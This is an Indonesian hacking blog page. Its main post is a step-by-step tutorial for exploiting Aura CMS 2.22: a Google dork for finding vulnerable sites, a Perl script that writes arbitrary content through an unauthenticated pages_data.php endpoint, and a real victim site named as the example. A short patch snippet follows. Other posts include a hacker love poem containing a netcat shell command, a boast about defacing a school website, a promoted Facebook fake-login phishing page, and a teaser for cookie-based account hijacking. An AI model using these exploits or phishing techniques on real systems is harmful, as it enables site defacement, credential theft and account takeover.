Coretan Teatzo

Sahabat, lagi-lagi saya nemu yang aneh-aneh di om Google
, niat hati mau cari puisi buat tugas sekolah, ehh dapet nih puisi,

Puisi dari Seorang hacker neh, romantis banget

Seandainya hatimu adalah sebuah system, maka aku akan scan kamu untuk mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku c:\> nc -l -o -v -e ke hatimu,tapi aku hanya berani ping di belakang anonymouse proxy, inikah rasanya jatuh cinta sehingga membuatku seperti pecundang atau aku memang pecundang sejati whatever!

Seandainya hatimu adalah sebuah system,
ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?. apa aku harus pasang backdor “Remote Connect-Back Shell”jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.

Seandainya hatimu adalah sebuah system,
saat semua request-ku diterima aku akan nogkrong terus di bugtraq untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry, dan menyeting error pagemu ” The page cannot be found Coz Has Been Owned by Someone get out!” aku janji gak bakalan ada malicious program atau service yang hidden, karena aku sangat sayang dan mencintaimu.

Seandainya hatimu adalah sebuah system,
jangan ada kata “You dont have permission to access it” untuk aku, kalau ga mau di ping flood Atau DDos Attack jangan ah….! kamu harus menjadi sang bidadari penyelamatku.

Seandainya hatimu adalah sebuah system, …?

Tapi sayang hatimu bukanlah sebuah system,
kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!
Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat menangkalnya selain …kamu.

xixi, ternyata “Hacker” juga manusia yang punya perasaan yah.. khu-khu. Sayang aku bukan seorang hacker,

wuiih.. lama saya ga posting artikel mengenai dunia yang di cap “hitam” alias “underwear” ( Baca : Gelap ).

ya, pada kesempatan kali ini saya akan memberikan info mengenai sebuah tekhnik exploit yang dapat digunakan terhadap Aura CMS. tepatnya pada file pages_data.php, ( bug ini udah ada cukup lama lo, sekitar agustus tahun lalu )

CMS karya anak bangsa ini ternyata juga tidak terhindar dari yang namanya “bugs”. wuiih.. ngeri ah, punya saudara sendiri kok di “Exploit” ? >:<

Tenang sahabat, disini saya cuma memberikan info aja kok, dan juga pada artikel ini juga akan dibahas bagaimana untuk mem”patch” bug tersebut, jadi tenang aja buat para sahabat blogger yang kebetulan menggunakan Aura CMS, malah kalian harus bangga lo, menggunakan produk dalam negeri. >U

Ya, mari kita memancing, sebelumnya kita harus caru cacingnya dulu ( baca : umpan )

- ketik di google Powered By AuraCMS 2.22

- buka file pages_data.php nya, caranya ketik di address bar seperti ini :

http//www.target.com/js/pages/pages_data.php

ganti yang warna merah sesuai target yang didapat

- bila sitenya sudah di patch akan keluar kata-kata berikut

You Must Login First If Not Yet Have Account Please Register

- bila belum, biasanya kosong dan ada tulisan

{”pages”:[{"id":"1","judul":"blablabla"},{"id":"2","judul":"blablabla"},{"id":"3","blablabla":"blablabla"},{"id":"4","judul":"blablabla"},{"id":"5","judul":"blablabla"}],”pagging”:”"}

Kira-kira seperti itu,

- Selanjutanya siapkan sebuah script perl untuk exploitasinya, Oya sebelumnya bagi yang kompie-nya belum terinstall perl, bisa di donwload dulu disini >> CLICK HERE

berikut contoh script perl yang dibutuhkan :

use LWP:serAgent;
use HTTP:ookies;
use Getopt:ong;

my $isijudul = “ISI JUDUL”;
my $isikonten = “Isi Konten”;
my $ambilkue = “http://situstarget.com/index.php”;
my $kue = HTTP:ookies->new();
my $hasil = “”;
my $browser = LWP:serAgent->new;

$arbitrary = “http://situstarget.com/js/pages/pages_data.php?action=edit_saved&id=”;

$hasil = $browser->get($arbitrary);

$hasil = $browser->get($ambilkue);
$kue->extract_cookies($hasil);
$browser->cookie_jar($kue);

$arbitrary .= “1″;
$hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],);
$konten = $hasil->content;
print $konten ;

waw, kok ada smiley nya ?? tenang, ga pengaruh kok tinggal copy paste aja. .

berikut sedikit penjelasannya :

my $isijudul = “ISI JUDUL”;    >> ganti dengan judul yang sahabat inginkan

my $isikonten = “Isi Konten”; >>  Ganti dengan konten yang sahabat inginkan juga,

my $ambilkue = “http://situstarget.com/index.php”; >>   Ganti http://situstarget.com dengan situs asli target sahabat tadi.

$arbitrary = “http://situstarget.com/js/pages/pages_data.php?action=edit_saved&id=”;      >> Ganti HANYA http://situstarget.com saja !, sesuai target sahabat.

- Copy script diatas dan save dengan extensi .pl, lalu simpan di direktori yang mudah di ingat, ini hanya untuk mempermudah step selanjutnya.  >> contoh :    C:aura.pl

- buka command prompt, sebelumnya ketik perl -v untuk mengecek, apakah perl yang di download tadi sudah terinstall sebagaimana mestinya. Jika sudah terinstall akan keluar versi dari installer perl tersebut.

- masuk ke direktori file aura.pl tadi ( udah tau kan caranya ? ),  misal ada di dir C, ketik aza   >>  cd C:

- jalankan file aura.pl tadi. caranya ketik >>   C:aura.pl

- lihat hasilnya, ……… Tara….!!, gimana sobat, berhasil kan ?, for example : http://www.pkpujogja.or.id/, ( maaf buat adminnya )

Ya, sekarang adalah bagaimana car mem-”patch” ( baca : tutup ) bug tersebut.

huff… setelah googling cukup lama, akhirnya dapat juga…

if(!cek_login()){

echo “Maaf anda tidak diperkenankan mengakses halaman ini”;

}else{

if (session_is_registered (’LevelAkses’) && $_SESSION['LevelAkses']==”Administrator”){

copy potongan script tersebut dan paste diatas code switch (@$_GET['action']){ pada file pages_data.php

lalu pada akhir halaman sebelum ?> (akhir TAG untuk php) beri tanda }} untuk menutup code yg sudah di copy tadi.

sekian sahabat, info dari saya kali ini, semoga bermanfaat, dan ingat, jangan disalahgunakan yah

Thanks, Teatzo

Hmm.. lama tidak berkecimpungan di dunia maya, eh baru sempat untuk Online lagi dapet info yang cukup menarik dari blog teman saya > Metropolix’s blog

Im A Good Hacker Or Im A excellent deceiver ?

if you wanted to be hacker, Pay Me 100$ & I Can Teach U

MayBe I Can Fuck Your Ass Too..

xixixi, itulah penggalan kalimat yang ditulis TH0R, sang hacker di situs polri >> http://www.informatika.polri.go.id/

Yah.. demikian

Thanks,

Yah, berhubung saya anak yang baik dan amat tertarik untuk mengamati perkembangan sekolah kita tercinta, yang mau jadi sekolah SBI, maka saya mau mengabarkan ke semua temen-temen, bahwa situs sekolah kita sedang Maintenance alias diperbaiki

http://www.sman1-pemalang.sch.id/

Hehe, sekedar curhat neeh, sebenernya plong juga pikiranku, akhirnya situsnya mau diperbaiki oleh admin tercinta kita. Lho..? emang apa urusannya ama aku ?.

Gini, sebenernya waktu bulan November ato Desember kemaren saya pernah Deface tuh situs sekolahku, yah maklumlah, anak baru, pasti banyak isengnya. Parahnya “Bugs” nya itu kebuka bangets, ada di bagian komentar, yah saat itu juga, saya langsung kasih email ke guru saya yang notabennya sebagai sang admin.

Baca Selengkapnya

Seperti Halnya Friendster , Facebook pun mempunyai celah berupa “Phishing attack” berupa FAKE LOGIN. sebenarnya Phishing Attack memanfaatkan kecerobahan target. teknik ini memang udagh lama alias teknik jadul. But.. jangan kira tekhnik ini udagh basi, masih tetep ampuh lo.. buat HACKING !!! ^^

Live Preview : http://h1.ripway.com/t3at2o/Facebook/index.html

Baca Selengkapnya

uuaahh.. pagi- pagi pingin nge-post neey.. moga aza guna..

mm.. sebetulnya cara ini udah banyak yg tau dan keluar sejak dulu, tapi ga papa denk, buat nambah-nambah isi blog ^^

langsung aza…. untuk pengertian cookies itu sendiri silakan tanya aja ama bang google yah….
intinya aja,,dengan cookies…kita bisa masuk Account (dlm hal ini account FS) tanpa Email+pass!
walah? hebat kan? hehe….okeh! langsung ke lapangan yah….

Baca Selengkapnya